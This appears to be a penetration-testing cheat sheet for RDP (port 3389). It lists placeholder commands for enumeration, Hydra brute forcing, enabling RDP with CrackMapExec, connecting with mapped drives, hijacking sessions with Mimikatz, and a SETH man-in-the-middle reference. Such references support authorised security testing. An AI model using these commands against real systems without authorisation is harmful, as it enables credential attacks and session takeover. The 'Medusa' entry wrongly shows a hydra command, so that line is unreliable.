Port 3389 | RDP

Enumeration

Nmap

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 <IP>

Bruteforce

Brute forcing can easily lock user accounts. If possible enumerate the domain password policy before proceeding.

Hydra

hydra -L <User/s.txt> -P <Password/s.txt> rdp://<IP>

Medusa

hydra -t 4  -l <User> -P <Password/s.txt> rdp://<IP>

Connecting

Crackmapexec

Requires administrative privileges, enables RDP on the target host.

crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -M rdp -o ACTION=enable # Enable RDP

rdesktop

rdesktop -u <Username> <IP>
rdesktop -d <Domain> -u <Username> -p <Password> <IP>

xfreerdp

xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>'
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard

#Maps specified folder on attacking machine to RDP host
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

Hijacking

This method is not stealthy and will disconnect a users active terminal service session. However, you will also be able to connect to a disconnected session which could be stealthier.

This method also requires privileges as SYSTEM on the terminal server host.

Mimikatz

Invoke-Mimikatz -Command '"ts::sessions"'

Connect to the terminal services session.

Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'

Man-in-the-Middle

SETH can be used to perform Man-in-the-Middle attacks over RDP.

RDP MiTM

Last updated 3 years ago

hashtagEnumeration

hashtagNmap

hashtagBruteforce

hashtagHydra

hashtagMedusa

hashtagConnecting

hashtagCrackmapexec

hashtagrdesktop

hashtagxfreerdp

hashtagHijacking

hashtagMimikatz

hashtagMan-in-the-Middle